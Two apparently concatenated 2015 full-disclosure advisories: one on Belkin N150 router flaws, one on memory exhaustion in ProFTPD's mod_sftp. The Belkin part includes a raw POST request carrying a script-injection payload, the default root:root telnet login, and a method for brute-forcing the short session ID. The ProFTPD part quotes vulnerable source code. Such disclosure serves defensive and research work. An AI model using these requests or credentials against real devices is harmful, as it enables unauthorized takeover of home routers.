##Full Disclosure:#Exploit Title : Belkin N150 Wireless Home Router MultipleVulnerabilities#Exploit Author : Rahul Pratap Singh#Date : 30/Nov/2015#Home Page Link : http://www.belkin.com#Blog Url : 0x62626262.wordpress.com#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched→ Vulnerability/BUG Report :1)• Vulnerability Title : HTML/Script Injection• Version : F9K1009 v1• Firmware : 1.00.09→ Proof of Concept:"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_
Language" this parameter isvulnerable.https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/→ Steps to Reproduce:Send the following post request using Burpsuite,etcPOST /cgi-bin/webproc HTTP/1.1Host: 192.168.2.1User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Referer:http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMTConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 260%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D2)• Vulnerability Title : Session Hijacking• Version : F9K1009 v1• Firmware : 1.00.09→ Proof of Concept:Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMTsessionid is allocated using hex encoding and of fixed length i.e 8 .Therefore, it is very easy to bruteforce it in feasible amount for timeas this session id ranges from 00000000 to ffffffff→ Steps to Reproduce:Send the following request using Burpsuite and Bruteforce the sessionid.POST /cgi-bin/webproc HTTP/1.1Host: 192.168.2.1User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Referer:http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT3)• Vulnerability Title : Telnet Enabled with Default Pass• Version : F9K1009 v1• Firmware : 1.00.09→ Vulnerability Details:Telnet protocol can be used by an attacker to gain remote access to therouter with root privileges.→ Proof of Concept:https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/→ Steps to Reproduce:1) Open terminal2) Type following command: telnet 192.168.2.13) Default user and pass is root:root4)• Vulnerability Title : Cross Site Request Forgery• Version : F9K1009 v1• Firmware : 1.00.09→ Proof of Concept:Request doesn't contain any CSRF-token. Therefore, requests can beforged. It can be verified with any request.Status:Vendor Notified: 20 Oct 2015Vendor Notified Again: 25 Nov 2015No Response.Ref:https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
=============================================== Date: 29/11/2015 Credit: Nicholas Lemonias .::PROFTPD v1.3.5a HEAP OVERFLOWS ::.ADVANCED INFORMATION SECURITY CORPORATION Keeping Things Simple!==============================
======================== .88888888:. 88888888.88888. .8888888888888888. 888888888888888888 888' _`888'_ `88888 888 888 888 88888 888_888_::_888_:888 888:::,::,:::::8888 888`:::::::::'`8888 .888 `::::' 8:88. 8888 `8:888. .8888' `888888. .8888:.. .::. ...:'8888888:. .8888.' :' `'::`88:88888 .8888 ' `.888:8888. 888:8 . 888:88888 .888:88 .: 888:88888: 8888888. :: 88:888888 `.::.888. :: .88888888 .::::::.888. :: :::`888'.:. ::::::::::.888 ' .:::::::::::: ::::::::::::.8 ' .:8::::::::::::..::::::::::::::. .:888::::::::::::::::::::::::::::888:.__..:88888:::::::::::' `'.:::::::::::88888888888.888:::::::::' `':::_:' -- '' -'-' `':_::::'`. w00t! w00t! w00t! ~ Keeping Things Simple! ==================INTRODUCTION ================== ProFTPD is Free and open-source software, compatible with Unix-like systems and Microsoft Windows (via Cygwin). Along with vsftpd and Pure-FTPd, ProFTPD is among the most popular FTP servers in Unix-like environments today. Compared to those, which focus e.g. on simplicity, speed or security, ProFTPD's primary design goal is to be a highly feature rich FTP server, exposing a large amount of configuration options to the user ==================================================== Description: During a manual source code audit of ProFTPD latest, various security issues were discovered. [3] ================================================================================CODE SNIPPET (PoC 1)=========================== ../../mod_sftp/fxp.c:1217-1251static struct fxp_extpair *fxp_msg_read_extpair(pool *p, unsigned char **buf, uint32_t *buflen) { uint32_t namelen, datalen; unsigned char *name, *data; struct fxp_extpair *extpair; namelen = sftp_msg_read_int(p, buf, buflen); if (*buflen < namelen) { (void) pr_log_writefile(sftp_logfd, MOD_SFTP_VERSION, "SFTP message format error: unable to read %lu bytes of extpair name " "data (buflen = %lu)", (unsigned long) namelen, (unsigned long) *buflen); SFTP_DISCONNECT_CONN(SFTP_SSH2_DISCONNECT_BY_APPLICATION, NULL); } name = palloc(p, namelen + 1); memcpy(name, *buf, namelen); (*buf) += namelen; (*buflen) -= namelen; name[namelen] = '\0'; datalen = sftp_msg_read_int(p, buf, buflen); if (datalen > 0) { data = sftp_msg_read_data(p, buf, buflen, datalen); } else { data = NULL; } extpair = palloc(p, sizeof(struct fxp_extpair)); extpair->ext_name = (char *) name; extpair->ext_datalen = datalen; extpair->ext_data = data; return extpair;}=====================RATIONALE=====================Part of the SFTP handshake involves "extensions", which are key/valuepairs, comprised of strings. In SSH, strings are encoded for networktransport as a 32-bit length, followed by the bytes.The mod_sftp module has no manual bounds/length metrics / limitationswhen reading SFTP extension key/value data from the network. A malicious attacker might attempt to encode large values, andallocate more memory than is necessary, resulting in uncontrollablememory exhaustion / and resource consumption.=======================CONCLUSION=======================To avoid undue resource exhaustion by a remote client, mod_sftp shouldinclude a patch on the maximum length of acceptable extensionkeys/values, as reported by our earlier Proftpd report.REPORT TIMELINE==============================22/11/2015 Reported to vendor. (Initial Report) [3]25/11/2015 Second report to vendor.29/11/2015 Bug Report / Patch circulation.Big thanks to TJ from Proftpd for the prompt response to the issue,and excellent cooperation in security. ============================== ACKNOWLEDGEMENTS ==============================PacketStorm SecurityTEAM TESO, w00w00, Netric, b0iler (eyeonsecurity), wootehfoot,badpack3t (SP), Vandal (Vic), s0kket, mantis, Big_Al , ELFQrin, bob(dtors), epic, RaT for their ~ legendary mark.====================REFERENCES====================[1] Proftpd. 2015. Proftpd Bug Report , MOD_SFTP Bug Report.[ONLINE] Available at:http://bugs.proftpd.org/show_bug.cgi?id=4210. [Accessed 29 November 2015].[2] Lemonias, N. (2015). SecurityFocus - Proftpd Heap Overflow.[ONLINE] Securityfocus.com. Available at:http://www.securityfocus.com/archive/1/536953/30/0/threaded[Accessed 29 November 2015].[3] Cnvd.org.cn, (2015). China's Emergency Response Team, Proftpd1.3.5a report - CERT.[online] Available at:http://www.cnvd.org.cn/flaw/show/CNVD-2015-07798 [Accessed 30 Nov.2015].
